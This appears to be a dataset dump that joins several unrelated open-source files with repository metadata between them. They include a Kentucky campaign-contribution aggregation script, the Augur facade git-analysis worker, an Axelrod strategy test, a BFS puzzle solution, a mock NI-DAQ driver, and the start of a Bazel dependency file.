print(str(dem_contrib_count) + ' contributions to Democratic committees, totaling $' + str(dem_contrib_sum))
generated_js.write('to_democrats = ' + str(dem_contrib_sum) + '\n')
# How much money has been donated to each presidential candidate from Kentuckians?
# How many donations did each presidential candidate receive from Kentuckians?
# Who were the top candidate KY donors, by amount donated?
def ky_by_candidate():
generated_js.write('candidate_contributions = [')
current_cand_ky_contrib = ky_candidate_contributions.where(
lambda r: r['cmte_id'] in current_candidate_cmte_ids
)
current_candidate_groups = current_cand_ky_contrib.group_by('cand_nm')
current_candidate_totals = current_candidate_groups.aggregate([
('contributions_count', agate.Count()),
('contributions_sum', agate.Sum('contb_receipt_amt'))
])
sorted_current_candidate_totals = current_candidate_totals.order_by('contributions_sum', reverse=True)
for row in sorted_current_candidate_totals.rows:
generated_js.write('{name: "' + row[0] + '", count: ' + str(row[1]) + ', sum: ' + str(row[2]) + ', status: "current"},')
dropped_cand_ky_contrib = ky_candidate_contributions.where(
lambda r: r['cmte_id'] not in current_candidate_cmte_ids
)
dropped_candidate_groups = dropped_cand_ky_contrib.group_by('cand_nm')
dropped_candidate_totals = dropped_candidate_groups.aggregate([
('contributions_count', agate.Count()),
('contributions_sum', agate.Sum('contb_receipt_amt'))
])
sorted_dropped_candidate_totals = dropped_candidate_totals.order_by('contributions_sum', reverse=True)
filtered_dropped_candidate_totals = sorted_dropped_candidate_totals.where(
lambda r: r['contributions_sum'] > 25000
)
for row in filtered_dropped_candidate_totals.rows:
generated_js.write('{name: "' + row[0] + '", count: ' + str(row[1]) + ', sum: ' + str(row[2]) + ', status: "dropped"},')
generated_js.write(']\n')
def candidate_time_charts():
os.remove('app/data/candidate_charts.js')
text_type = agate.Text()
datetime_type = agate.DateTime()
chart_js = open('app/data/candidate_charts.js', 'a')
candidate_contribs_with_monthyear = ky_candidate_contributions.compute([
('month_year', agate.Formula(text_type, lambda r: r['contb_receipt_dt'][-6:])),
('date', agate.Formula(text_type, lambda r: datetime.datetime.strptime(r['contb_receipt_dt'], '%d-%b-%y')))
])
date_sorted_candidat_contribs = candidate_contribs_with_monthyear.order_by('date')
restricted_date_candidate_contribs = date_sorted_candidat_contribs.where(
lambda r: r['date'] > '2015-02-28 00:00:00'
)
by_candidate_contribs = candidate_contribs_with_monthyear.group_by('cand_nm')
# We need a list of unique candidates and a list of unique month_years
# Then we need to say, for each month_year and each candidate, how many contributions
# happened.
# We only need to write one label variable for all candidates:
# labels = ['FEB-15', 'MAR-15', etc...]
# For each candidate, we need:
# candidateName_series = [200, 34, 885, 123, etc...]
# Get unique list of month_years.
# These are our labels.
# We'll have to figure out how to sort these
month_years = []
for row in restricted_date_candidate_contribs.rows:
month_year = row['month_year']
if month_year in month_years:
pass
else:
month_years.append(str(month_year))
# Get unique list of candidates
candidates = []
for row in candidate_contribs_with_monthyear.rows:
candidate = row['cand_nm']
if candidate in candidates:
pass
else:
candidates.append(candidate)
candidate_month_year_groups = by_candidate_contribs.group_by(
lambda r: r['month_year'],
key_name='month_year_group'
)
month_year_counts = candidate_month_year_groups.aggregate([
('contribution_count', agate.Count()),
('contribution_sum', agate.Sum('contb_receipt_amt'))
])
#month_year_counts.print_table(max_rows=200)
chart_js.write('count_labels = ' + str(month_years) + '\n')
# For each candidate, each month, we want one value for count and one value for sum
# If these values cannot be found in the month_year_counts table, then we should record a 0
for candidate in candidates:
count_value_list = []
sum_value_list = []
for month in month_years:
contrib_count = 0
contrib_sum = 0
for row in month_year_counts.rows:
if row['cand_nm'] == candidate:
series_label = candidate.split(',')[0].lower()
if month == row['month_year_group']:
contrib_count = str(row['contribution_count'])
#contrib_count = '{:,f}'.format(row['contribution_count'])
contrib_count_dict = {}
contrib_count_dict['meta'] = str('Contributions to ' + candidate + ' for ' + month)
contrib_count_dict['value'] = contrib_count
count_value_list.append(dict(contrib_count_dict))
contrib_sum = str(row['contribution_sum'])
#contrib_sum = '${:,.2f}'.format(row['contribution_sum'])
contrib_sum_dict = {}
contrib_sum_dict['meta'] = str('Amt. contributed to ' + candidate + ' for ' + month)
contrib_sum_dict['value'] = contrib_sum
sum_value_list.append(dict(contrib_sum_dict))
else:
pass
if contrib_count == 0:
contrib_count_dict = {}
contrib_count_dict['meta'] = str('Contributions to ' + candidate + ' for ' + month)
contrib_count_dict['value'] = '0'
count_value_list.append(dict(contrib_count_dict))
if contrib_sum == 0:
contrib_sum_dict = {}
contrib_sum_dict['meta'] = str('Amount contributed to ' + candidate + ' for ' + month)
contrib_sum_dict['value'] = '0'
sum_value_list.append(dict(contrib_sum_dict))
chart_js.write(series_label + '_count_series = ' + str(count_value_list) + '\n')
chart_js.write(series_label + '_sum_series = ' + str(sum_value_list) + '\n')
chart_js.close()
# Who were the top candidate KY donors, by amount donated?
def top_ky_donors_candidates():
contributor_groups = ky_candidate_contributions.group_by('contbr_nm')
contributor_totals = contributor_groups.aggregate([
('contributions_count', agate.Count()),
('contributions_sum', agate.Sum('contb_receipt_amt'))
])
sorted_contributor_totals = contributor_totals.order_by('contributions_sum', reverse=True)
sorted_contributor_totals.print_table()
generated_js.write('top_donors_to_candidates = [')
for row in itertools.islice(sorted_contributor_totals.rows,0,5):
generated_js.write('{name: "' + row[0] + '", count: ' + str(row[1]) + ', sum: ' + str(row[2]) + '},')
generated_js.write(']\n')
# Who were the top PAC KY donors, by amount donated?
def top_ky_donors_pac():
contributor_groups = ky_all_contributions.group_by('NAME')
contributor_totals = contributor_groups.aggregate([
('contributions_count', agate.Count()),
('contributions_sum', agate.Sum('TRANSACTION_AMT'))
])
sorted_contributor_totals = contributor_totals.order_by('contributions_sum', reverse=True)
sorted_contributor_totals.print_table()
generated_js.write('top_donors_to_pacs = [')
for row in itertools.islice(sorted_contributor_totals.rows,0,5):
generated_js.write('{name: "' + row[0] + '", count: ' + str(row[1]) + ', sum: ' + str(row[2]) + '},')
generated_js.write(']\n')
os.remove('app/data/ky_totals.js')
generated_js = open('app/data/ky_totals.js', 'a')
candidate_time_charts()
top_ky_donors_pac()
top_ky_donors_candidates()
ky_by_candidate()
print_contributions_by_cmte_type()
print_ky_candidate_summary()
print_ky_overall_summary()
print_updated()
print_state()
generated_js.close()
| 41.585014
| 264
| 0.670755
|
4a15c48152e1745b172bd9167adfba64c4805037
| 13,075
|
py
|
Python
|
workers/facade_worker/facade_worker/facade00mainprogram.py
|
pratikmishra356/augur
|
6f45fb7428af83b09a0c9dbf08116a59f58520aa
|
[
"MIT"
] | null | null | null |
workers/facade_worker/facade_worker/facade00mainprogram.py
|
pratikmishra356/augur
|
6f45fb7428af83b09a0c9dbf08116a59f58520aa
|
[
"MIT"
] | null | null | null |
workers/facade_worker/facade_worker/facade00mainprogram.py
|
pratikmishra356/augur
|
6f45fb7428af83b09a0c9dbf08116a59f58520aa
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright 2016-2018 Brian Warner
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
# Git repo maintenance
#
# This script is responsible for cloning new repos and keeping existing repos up
# to date. It can be run as often as you want (and will detect when it's
# already running, so as not to spawn parallel processes), but once or twice per
# day should be more than sufficient. Each time it runs, it updates the repo
# and checks for any parents of HEAD that aren't already accounted for in the
# repos. It also rebuilds analysis data, checks any changed affiliations and
# aliases, and caches data for display.
import pymysql, sys, platform, imp, time, datetime, html.parser, subprocess, os, getopt, xlsxwriter, configparser, logging
from multiprocessing import Process, Queue
from facade_worker.facade01config import Config#increment_db, update_db, migrate_database_config, database_connection, get_setting, update_status, log_activity
from facade_worker.facade02utilitymethods import update_repo_log, trim_commit, store_working_author, trim_author
from facade_worker.facade03analyzecommit import analyze_commit
from facade_worker.facade04postanalysiscleanup import git_repo_cleanup
from facade_worker.facade05repofetch import git_repo_initialize, check_for_repo_updates, force_repo_updates, force_repo_analysis, git_repo_updates
from facade_worker.facade06analyze import analysis
from facade_worker.facade07rebuildcache import nuke_affiliations, fill_empty_affiliations, invalidate_caches, rebuild_unknown_affiliation_and_web_caches
from workers.util import read_config
from workers.worker_base import Worker
html = html.parser.HTMLParser()
class FacadeWorker(Worker):
def __init__(self, config={}, task=None):
worker_type = "facade_worker"
# Define what this worker can be given and know how to interpret
given = [['repo_group']]
models = ['commits']
# Define the tables needed to insert, update, or delete on
data_tables = []
operations_tables = ['worker_history', 'worker_job']
# Run the general worker initialization
super().__init__(worker_type, config, given, models, data_tables, operations_tables)
# Facade-specific config
self.cfg = Config()
# Define data collection info
self.tool_source = 'Facade Worker'
self.tool_version = '0.0.1'
self.data_source = 'Git Log'
def initialize_database_connections(self):
# Set up the database
db_user = self.config['user_database']
db_pass = self.config['password_database']
db_name = self.config['name_database']
db_host = self.config['host_database']
db_port = self.config['port_database']
# Open a general-purpose connection
self.db, self.cursor = self.cfg.database_connection(
db_host,
db_user,
db_pass,
db_name,
db_port, False, False)
# Open a connection for the people database
self.db_people,self.cursor_people = self.cfg.database_connection(
db_host,
db_user,
db_pass,
db_name,
db_port, True, False)
# Check if the database is current and update it if necessary
try:
self.current_db = int(self.cfg.get_setting('database_version'))
except:
# Catch databases which existed before database versioning
self.current_db = -1
def collect(self):
""" Function to process each entry in the worker's task queue
Determines what action to take based off the message type
"""
self.initialize_logging() # need to initialize logging again in child process cause multiprocessing
self.logger.info("Starting data collection process\n")
self.initialize_database_connections()
while True:
if not self._queue.empty():
message = self._queue.get() # Get the task off our MP queue
else:
break
self.logger.info("Popped off message: {}\n".format(str(message)))
if message['job_type'] == 'STOP':
break
# If task is not a valid job type
if message['job_type'] != 'MAINTAIN' and message['job_type'] != 'UPDATE':
raise ValueError('{} is not a recognized task type'.format(message['job_type']))
pass
try:
self.commits_model(message)
except Exception as e:
self.logger.error(e)
raise(e)
break
def commits_model(self, message):
# Figure out what we need to do
limited_run = self.augur_config.get_value("Facade", "limited_run")
delete_marked_repos = self.augur_config.get_value("Facade", "delete_marked_repos")
pull_repos = self.augur_config.get_value("Facade", "pull_repos")
clone_repos = self.augur_config.get_value("Facade", "clone_repos")
check_updates = self.augur_config.get_value("Facade", "check_updates")
force_updates = self.augur_config.get_value("Facade", "force_updates")
run_analysis = self.augur_config.get_value("Facade", "run_analysis")
force_analysis = self.augur_config.get_value("Facade", "force_analysis")
nuke_stored_affiliations = self.augur_config.get_value("Facade", "nuke_stored_affiliations")
fix_affiliations = self.augur_config.get_value("Facade", "fix_affiliations")
force_invalidate_caches = self.augur_config.get_value("Facade", "force_invalidate_caches")
rebuild_caches = self.augur_config.get_value("Facade", "rebuild_caches") #if abs((datetime.datetime.strptime(self.cfg.get_setting('aliases_processed')[:-3],
# '%Y-%m-%d %I:%M:%S.%f') - datetime.datetime.now()).total_seconds()) // 3600 > int(self.cfg.get_setting(
# 'update_frequency')) else 0
force_invalidate_caches = self.augur_config.get_value("Facade", "force_invalidate_caches")
create_xlsx_summary_files = self.augur_config.get_value("Facade", "create_xlsx_summary_files")
multithreaded = self.augur_config.get_value("Facade", "multithreaded")
opts,args = getopt.getopt(sys.argv[1:],'hdpcuUaAmnfIrx')
for opt in opts:
if opt[0] == '-h':
print("\nfacade-worker.py does everything by default except invalidating caches\n"
"and forcing updates, unless invoked with one of the following options.\n"
"In those cases, it will only do what you have selected.\n\n"
"Options:\n"
" -d Delete marked repos\n"
" -c Run 'git clone' on new repos\n"
" -u Check if any repos should be marked for updating\n"
" -U Force all repos to be marked for updating\n"
" -p Run 'git pull' on repos\n"
" -a Analyze git repos\n"
" -A Force all repos to be analyzed\n"
" -m Disable multithreaded mode (but why?)\n"
" -n Nuke stored affiliations (if mappings modified by hand)\n"
" -f Fill empty affiliations\n"
" -I Invalidate caches\n"
" -r Rebuild unknown affiliation and web caches\n"
" -x Create Excel summary files\n\n")
sys.exit(0)
elif opt[0] == '-d':
delete_marked_repos = 1
limited_run = 1
self.cfg.log_activity('Info','Option set: delete marked repos.')
elif opt[0] == '-c':
clone_repos = 1
limited_run = 1
self.cfg.log_activity('Info','Option set: clone new repos.')
elif opt[0] == '-u':
check_updates = 1
limited_run = 1
self.cfg.log_activity('Info','Option set: checking for repo updates')
elif opt[0] == '-U':
force_updates = 1
self.cfg.log_activity('Info','Option set: forcing repo updates')
elif opt[0] == '-p':
pull_repos = 1
limited_run = 1
self.cfg.log_activity('Info','Option set: update repos.')
elif opt[0] == '-a':
run_analysis = 1
limited_run = 1
self.cfg.log_activity('Info','Option set: running analysis.')
elif opt[0] == '-A':
force_analysis = 1
run_analysis = 1
limited_run = 1
self.cfg.log_activity('Info','Option set: forcing analysis.')
elif opt[0] == '-m':
multithreaded = 0
self.cfg.log_activity('Info','Option set: disabling multithreading.')
elif opt[0] == '-n':
nuke_stored_affiliations = 1
limited_run = 1
self.cfg.log_activity('Info','Option set: nuking all affiliations')
elif opt[0] == '-f':
fix_affiliations = 1
limited_run = 1
self.cfg.log_activity('Info','Option set: fixing affiliations.')
elif opt[0] == '-I':
force_invalidate_caches = 1
limited_run = 1
self.cfg.log_activity('Info','Option set: Invalidate caches.')
elif opt[0] == '-r':
rebuild_caches = 1
limited_run = 1
self.cfg.log_activity('Info','Option set: rebuilding caches.')
elif opt[0] == '-x':
create_xlsx_summary_files = 1
limited_run = 1
self.cfg.log_activity('Info','Option set: creating Excel summary files.')
# Get the location of the directory where git repos are stored
repo_base_directory = self.cfg.repo_base_directory
# Determine if it's safe to start the script
current_status = self.cfg.get_setting('utility_status')
if current_status != 'Idle':
self.cfg.log_activity('Error','Something is already running, aborting maintenance '
'and analysis.\nIt is unsafe to continue.')
# sys.exit(1)
if len(repo_base_directory) == 0:
self.cfg.log_activity('Error','No base directory. It is unsafe to continue.')
self.cfg.update_status('Failed: No base directory')
sys.exit(1)
# Begin working
start_time = time.time()
self.cfg.log_activity('Quiet','Running facade-worker')
if not limited_run or (limited_run and delete_marked_repos):
git_repo_cleanup(self.cfg)
if not limited_run or (limited_run and clone_repos):
git_repo_initialize(self.cfg)
if not limited_run or (limited_run and check_updates):
check_for_repo_updates(self.cfg)
if force_updates:
force_repo_updates(self.cfg)
if not limited_run or (limited_run and pull_repos):
git_repo_updates(self.cfg)
if force_analysis:
force_repo_analysis(self.cfg)
if not limited_run or (limited_run and run_analysis):
analysis(self.cfg, multithreaded)
if nuke_stored_affiliations:
nuke_affiliations(self.cfg)
if not limited_run or (limited_run and fix_affiliations):
fill_empty_affiliations(self.cfg)
if force_invalidate_caches:
invalidate_caches(self.cfg)
if not limited_run or (limited_run and rebuild_caches):
rebuild_unknown_affiliation_and_web_caches(self.cfg)
if not limited_run or (limited_run and create_xlsx_summary_files):
self.cfg.log_activity('Info','Creating summary Excel files')
# from excel_generators import *
self.cfg.log_activity('Info','Creating summary Excel files (complete)')
# All done
self.cfg.update_status('Idle')
self.cfg.log_activity('Quiet','facade-worker.py completed')
elapsed_time = time.time() - start_time
print('\nCompleted in %s\n' % datetime.timedelta(seconds=int(elapsed_time)))
self.cfg.cursor.close()
self.cfg.cursor_people.close()
self.cfg.db.close()
self.cfg.db_people.close()
| 42.041801
| 169
| 0.619426
|
4a15c6268e0cd825f3254893fd5970bf47d5d509
| 55
|
py
|
Python
|
fb.py
|
payz404/FBDownloader
|
af59dd66c76851e9e85a1da5cfb5299b20ac231b
|
[
"Apache-2.0"
] | null | null | null |
fb.py
|
payz404/FBDownloader
|
af59dd66c76851e9e85a1da5cfb5299b20ac231b
|
[
"Apache-2.0"
] | null | null | null |
fb.py
|
payz404/FBDownloader
|
af59dd66c76851e9e85a1da5cfb5299b20ac231b
|
[
"Apache-2.0"
] | null | null | null |
from Main import *
fb = fbDownloader()
fb.Download()
| 11
| 19
| 0.690909
|
4a15c7aef85622d01c8b4cc39e5b3a3ab4b10c0c
| 712
|
py
|
Python
|
axelrod/tests/unit/test_negation.py
|
t0nyt93/Axelroddd
|
66d95378d3ece8b32afeb1c77d305397bd9a815e
|
[
"MIT"
] | null | null | null |
axelrod/tests/unit/test_negation.py
|
t0nyt93/Axelroddd
|
66d95378d3ece8b32afeb1c77d305397bd9a815e
|
[
"MIT"
] | null | null | null |
axelrod/tests/unit/test_negation.py
|
t0nyt93/Axelroddd
|
66d95378d3ece8b32afeb1c77d305397bd9a815e
|
[
"MIT"
] | 1
|
2019-03-11T08:56:09.000Z
|
2019-03-11T08:56:09.000Z
|
"""Tests for the Neg Strategy"""
import axelrod
from .test_player import TestPlayer
C, D = axelrod.Actions.C, axelrod.Actions.D
class TestNegation(TestPlayer):
name = "Negation"
player = axelrod.Negation
expected_classifier = {
'memory_depth': 1,
'stochastic': True,
'makes_use_of': set(),
'long_run_time': False,
'inspects_source': False,
'manipulates_source': False,
'manipulates_state': False
}
def test_strategy(self):
# First move is random.
self.first_play_test(C, seed=1)
self.first_play_test(D, seed=2)
# Repeats opposite of opponents last action.
self.second_play_test(D, C, D, C)
| 24.551724
| 52
| 0.630618
|
4a15c87d561ea3f8954efb8602d0e8a7db532edc
| 939
|
py
|
Python
|
src/data/1068.py
|
NULLCT/LOMC
|
79a16474a8f21310e0fb47e536d527dd5dc6d655
|
[
"MIT"
] | null | null | null |
src/data/1068.py
|
NULLCT/LOMC
|
79a16474a8f21310e0fb47e536d527dd5dc6d655
|
[
"MIT"
] | null | null | null |
src/data/1068.py
|
NULLCT/LOMC
|
79a16474a8f21310e0fb47e536d527dd5dc6d655
|
[
"MIT"
] | null | null | null |
from collections import deque
def BFS(start, tree):
search = deque()
search.append(start)
visited = {start[0]} # リストでやるとおそい
#kyori = {}
while len(search) > 0:
# print(search)
node, depth = search.popleft()
depth_list[node] = depth
# print(node,depth)
# if node in visited:
# continue
for i in tree[node]:
if i not in visited:
search.append([i, depth + 1])
visited.add(i)
n, q = map(int, input().split())
edges = [list() for i in range(n)]
for i in range(n - 1):
a, b = map(int, input().split())
a, b = a - 1, b - 1
edges[a].append(b)
edges[b].append(a)
depth_list = [0] * n
BFS((0, 0), edges)
#print(depth_list)
for k in range(q):
c, d = map(int, input().split())
c, d = c - 1, d - 1
if (depth_list[c] - depth_list[d]) % 2 == 0:
print("Town")
else:
print("Road")
| 22.902439
| 48
| 0.514377
|
4a15c8ad3484167858dca62b2456d81fe21f277b
| 9,746
|
py
|
Python
|
acq4/drivers/nidaq/mock.py
|
aleonlein/acq4
|
4b1fcb9ad2c5e8d4595a2b9cf99d50ece0c0f555
|
[
"MIT"
] | 1
|
2020-06-04T17:04:53.000Z
|
2020-06-04T17:04:53.000Z
|
acq4/drivers/nidaq/mock.py
|
aleonlein/acq4
|
4b1fcb9ad2c5e8d4595a2b9cf99d50ece0c0f555
|
[
"MIT"
] | 24
|
2016-09-27T17:25:24.000Z
|
2017-03-02T21:00:11.000Z
|
acq4/drivers/nidaq/mock.py
|
sensapex/acq4
|
9561ba73caff42c609bd02270527858433862ad8
|
[
"MIT"
] | 4
|
2016-10-19T06:39:36.000Z
|
2019-09-30T21:06:45.000Z
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import six
import sys, time, os
import numpy as np
import acq4.util.clibrary as clibrary
import ctypes
modDir = os.path.dirname(__file__)
headerFiles = [os.path.join(modDir, "NIDAQmx.h")]
cacheFile = os.path.join(modDir, 'NIDAQmx_headers_%s.cache' % sys.platform)
DEFS = clibrary.CParser(headerFiles, cache=cacheFile, types={'__int64': ('long long')}, verbose=False)
from . import SuperTask
class MockNIDAQ:
def __init__(self):
self.lib = clibrary.CLibrary(None, DEFS, prefix='DAQmx_')
#self.data = mockdata.getMockData('cell')
#self.data = hstack([self.data, self.data])
#self.sampleRate = 20000.
#self.loopTime = 20.
#self.dataPtr = 0.0
self.devs = {
'Dev1': {
'aiChans': {'/Dev1/ai0': 0, '/Dev1/ai1': 0, '/Dev1/ai2': 0, '/Dev1/ai3': 0},
'aoChans': {'/Dev1/ao0': 0, '/Dev1/ao1': 0, '/Dev1/ao2': 0, '/Dev1/ao3': 0},
'ports': {'/Dev1/port0': 0},
'lines': {'/Dev1/port0/line0': 0, '/Dev1/port0/line1': 0, '/Dev1/port0/line2': 0, '/Dev1/port0/line3': 0,},
}
}
self.clocks = {}
def __getattr__(self, attr):
return getattr(self.lib, attr)
def listAIChannels(self, dev):
return list(self.devs[dev]['aiChans'].keys())
def listAOChannels(self, dev):
return list(self.devs[dev]['aoChans'].keys())
def listDILines(self, dev):
return list(self.devs[dev]['lines'].keys())
def listDIPorts(self, dev):
return list(self.devs[dev]['ports'].keys())
def listDOLines(self, dev):
return list(self.devs[dev]['lines'].keys())
def listDOPorts(self, dev):
return list(self.devs[dev]['ports'].keys())
def listDevices(self):
return list(self.devs.keys())
def createTask(self, *args):
return self
def createSuperTask(self):
return SuperTask.SuperTask(self)
def start(self):
self.dataPtr = time.time()
def read(self, size):
#dataLen = size / self.sampleRate
#dataEnd = self.dataPtr + dataLen
#now = time.time()
#if dataEnd > now:
#time.sleep(dataEnd-now)
#start = int((self.dataPtr % self.loopTime) * self.sampleRate)
#stop = int(start + size)
#self.dataPtr = dataEnd
##print "read", start, stop
##print "DAQ Returning %d:%d at %f" % (start, stop, time.time())
#return (self.data[:, start:stop], size)
return np.zeros(size)
def GetReadAvailSampPerChan(self):
return self.sampleRate * (time.time() - self.dataPtr)
def createTask(self):
return Task(self)
def interpretMode(self, mode):
modes = {
'rse': self.lib.Val_RSE,
'nrse': self.lib.Val_NRSE,
'diff': self.lib.Val_Diff,
'chanperline': self.lib.Val_ChanPerLine,
'chanforalllines': self.lib.Val_ChanForAllLines
}
if isinstance(mode, six.string_types):
mode = mode.lower()
mode = modes.get(mode, None)
return mode
def interpretChannel(self, chan):
parts = chan.lstrip('/').split('/')
dev = parts.pop(0)
if len(parts) == 1 and parts[0].startswith('line'):
# normalize "/Dev1/line0' => ('Dev1', 'port0/line0')
chan = 'port0/' + parts[0]
else:
chan = '/'.join(parts)
return dev, chan
def writeAnalogSample(self, chan, value, vRange=[-10., 10.], timeout=10.0):
"""Set the value of an AO or DO port"""
t = self.createTask()
t.CreateAOVoltageChan(chan, "", vRange[0], vRange[1], self.lib.Val_Volts, None)
#t.WriteAnalogScalarF64(True, timeout, value, None)
def readAnalogSample(self, chan, mode=None, vRange=[-10., 10.], timeout=10.0):
"""Get the value of an AI port"""
if mode is None:
mode = self.lib.Val_Cfg_Default
else:
mode = self.interpretMode(mode)
t = self.createTask()
t.CreateAIVoltageChan(chan, "", mode, vRange[0], vRange[1], self.lib.Val_Volts, None)
#val = ctypes.c_double(0.)
#t.ReadAnalogScalarF64(timeout, byref(val), None)
#return val.value
return 0.0
def writeDigitalSample(self, chan, value, timeout=10.):
"""Set the value of an AO or DO port"""
dev, chan = self.interpretChannel(chan)
chan = '/%s/%s' % (dev, chan)
self.devs[dev]['lines'][chan] = value
# t = self.createTask()
# t.CreateDOChan(chan, "", self.lib.Val_ChanForAllLines)
#t.WriteDigitalScalarU32(True, timeout, value, None)
def readDigitalSample(self, chan, timeout=10.0):
"""Get the value of an AI port"""
dev, chan = self.interpretChannel(chan)
chan = '/%s/%s' % (dev, chan)
return self.devs[dev]['lines'][chan]
# t = self.createTask()
# t.CreateDIChan(chan, "", self.lib.Val_ChanForAllLines)
# val = ctypes.c_ulong(0)
# t.ReadDigitalScalarU32(timeout, byref(val), None)
# return val.value
def startClock(self, clock, duration):
self.clocks[clock] = (time.time(), duration)
def stopClock(self, clock):
if clock not in self.clocks:
return
now = time.time()
start, dur = self.clocks[clock]
diff = (start+dur)-now
if diff > 0:
time.sleep(diff)
def checkClock(self, clock):
now = time.time()
start, dur = self.clocks[clock]
diff = (start+dur)-now
return diff <= 0
class Task:
def __init__(self, nd):
self.nd = nd
self.chans = []
self.chOpts = []
self.clock = None
self.nativeClock = None
self.data = None
self.mode = None
#def __getattr__(self, attr):
#return lambda *args: self
def CreateAIVoltageChan(self, *args, **kargs):
self.chans.append(args[0])
self.chOpts.append(kargs)
self.mode = 'ai'
def CreateAOVoltageChan(self, *args, **kargs):
self.chans.append(args[0])
self.chOpts.append(kargs)
self.mode = 'ao'
def CreateDIChan(self, *args, **kargs):
self.chans.append(args[0])
self.chOpts.append(kargs)
self.mode = 'di'
def CreateDOChan(self, *args, **kargs):
self.chans.append(args[0])
self.chOpts.append(kargs)
self.mode = 'do'
def CfgSampClkTiming(self, clock, rate, b, c, nPts):
if 'ai' in self.chans[0]:
self.nativeClock = self.device()+'/ai/SampleClock'
elif 'ao' in self.chans[0]:
self.nativeClock = self.device()+'/ao/SampleClock'
if clock == '':
clock = None
self.clock = clock
self.rate = rate
self.nPts = nPts
#print self.chans, self.clock
def GetSampClkMaxRate(self):
return 2e6
def device(self):
return '/'+self.chans[0].split('/')[1]
def write(self, data):
self.data = data
## Send data off to callbacks if they were specified
#print "write:", self.chOpts
for i in range(len(self.chOpts)):
if 'mockFunc' in self.chOpts[i]:
self.chOpts[i]['mockFunc'](data[i], 1.0/self.rate)
return len(data)
def read(self):
dur = self.nPts / self.rate
tVals = np.linspace(0, dur, self.nPts)
if 'd' in self.mode:
data = np.empty((len(self.chans), self.nPts), dtype=np.int32)
else:
data = np.empty((len(self.chans), self.nPts))
for i in range(len(self.chOpts)):
if 'mockFunc' in self.chOpts[i]:
data[i] = self.chOpts[i]['mockFunc']()
else:
data[i] = 0
return (data, self.nPts)
def start(self):
## only start clock if it matches the native clock for this channel
if self.clock is None or self.clock == self.nativeClock:
dur = self.nPts / self.rate
self.nd.startClock(self.nativeClock, dur)
def stop(self):
if self.clock is None:
self.nd.stopClock(self.nativeClock)
else:
self.nd.stopClock(self.clock)
def isDone(self):
if self.clock is None:
return self.nd.checkClock(self.nativeClock)
else:
return self.nd.checkClock(self.clock)
def GetTaskNumChans(self):
return len(self.chans)
def isOutputTask(self):
return self.mode in ['ao', 'do']
def isInputTask(self):
return self.mode in ['ai', 'di']
def TaskControl(self, *args):
pass
def WriteAnalogScalarF64(self, a, timeout, val, b):
pass
def WriteDigitalScalarU32(self, a, timeout, val, b):
pass
#class SuperTask:
#def __init__(self, nd):
#self.nd = nd
#def __getattr__(self, attr):
#print "SuperTask."+attr
#return lambda *args, **kargs: self
NIDAQ = MockNIDAQ()
#class ModWrapper(object):
#def __init__(self, wrapped):
#self.wrapped = wrapped
#def __getattr__(self, name):
#try:
#return getattr(self.wrapped, name)
#except AttributeError:
#if name[:3] == 'Val':
#return None
#else:
#return lambda *args: NIDAQ
#def __iter__
#sys.modules[__name__] = ModWrapper(sys.modules[__name__])
| 31.038217
| 123
| 0.552842
|
4a15c8d1140cde18e1ae721f2cbb9aab0edf4eb5
| 43,226
|
bzl
|
Python
|
external.bzl
|
filmil/kythe
|
a030ce48ddf46b171736d136af10f8462c5a302a
|
[
"Apache-2.0"
] | null | null | null |
external.bzl
|
filmil/kythe
|
a030ce48ddf46b171736d136af10f8462c5a302a
|
[
"Apache-2.0"
] | null | null | null |
external.bzl
|
filmil/kythe
|
a030ce48ddf46b171736d136af10f8462c5a302a
|
[
"Apache-2.0"
] | null | null | null |
load("@bazel_gazelle//:deps.bzl", "gazelle_dependencies")
load("@bazel_tools//tools/build_defs/repo:git.bzl", "git_repository")
load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")
load("@io_bazel_rules_go//go:deps.bzl", "go_register_toolchains", "go_rules_dependencies")
load("@rules_java//java:repositories.bzl", "rules_java_dependencies")
load("@rules_jvm_external//:defs.bzl", "maven_install")
load("@rules_proto//proto:repositories.bzl", "rules_proto_dependencies")
load("@io_kythe//:setup.bzl", "github_archive", "maybe")
load("@io_kythe//tools:build_rules/shims.bzl", "go_repository")
load("@io_kythe//tools/build_rules/llvm:repo.bzl", "git_llvm_repository")
load("@io_kythe//third_party/leiningen:lein_repo.bzl", "lein_repository")
load("@io_kythe//tools/build_rules/lexyacc:lexyacc.bzl", "lexyacc_configure")
load("@io_kythe//tools/build_rules/build_event_stream:repo.bzl", "build_event_stream_repository")
load("@io_kythe//kythe/cxx/extractor:toolchain.bzl", cxx_extractor_register_toolchains = "register_toolchains")
load("@rules_python//python:repositories.bzl", "py_repositories")
load("@bazel_toolchains//repositories:repositories.bzl", bazel_toolchains_repositories = "repositories")
load("@io_bazel_rules_rust//rust:repositories.bzl", "rust_repositories")
load("@io_bazel_rules_rust//proto:repositories.bzl", "rust_proto_repositories")
load("@io_bazel_rules_rust//:workspace.bzl", "bazel_version")
# The raze macros automatically check for duplicated dependencies so we can
# simply load each macro here.
load("//kythe/rust/examples/hello_world/cargo:crates.bzl", fetch_example_hello_world_remote_crates = "raze_fetch_remote_crates")
load("//kythe/rust/extractor/cargo:crates.bzl", fetch_extractor_remote_crates = "raze_fetch_remote_crates")
load("//kythe/rust/indexer/cargo:crates.bzl", fetch_indexer_remote_crates = "raze_fetch_remote_crates")
def _rule_dependencies():
go_rules_dependencies()
go_register_toolchains()
gazelle_dependencies()
rules_java_dependencies()
rules_proto_dependencies()
py_repositories()
bazel_toolchains_repositories()
rust_repositories(version = "nightly", iso_date = "2020-06-23", dev_components = True)
rust_proto_repositories()
bazel_version(name = "bazel_version")
def _gazelle_ignore(**kwargs):
"""Dummy macro which causes gazelle to see a repository as already defined."""
def _proto_dependencies():
# Rather than pull down the entire Bazel source repository for a single file,
# just grab the file we need and use it locally.
maybe(
build_event_stream_repository,
name = "build_event_stream_proto",
revision = "2.2.0",
sha256s = {
"build_event_stream.proto": "aa71ad693b7b474517ee3702318603d76baef35a6c13e9f8980f3962d91c2827",
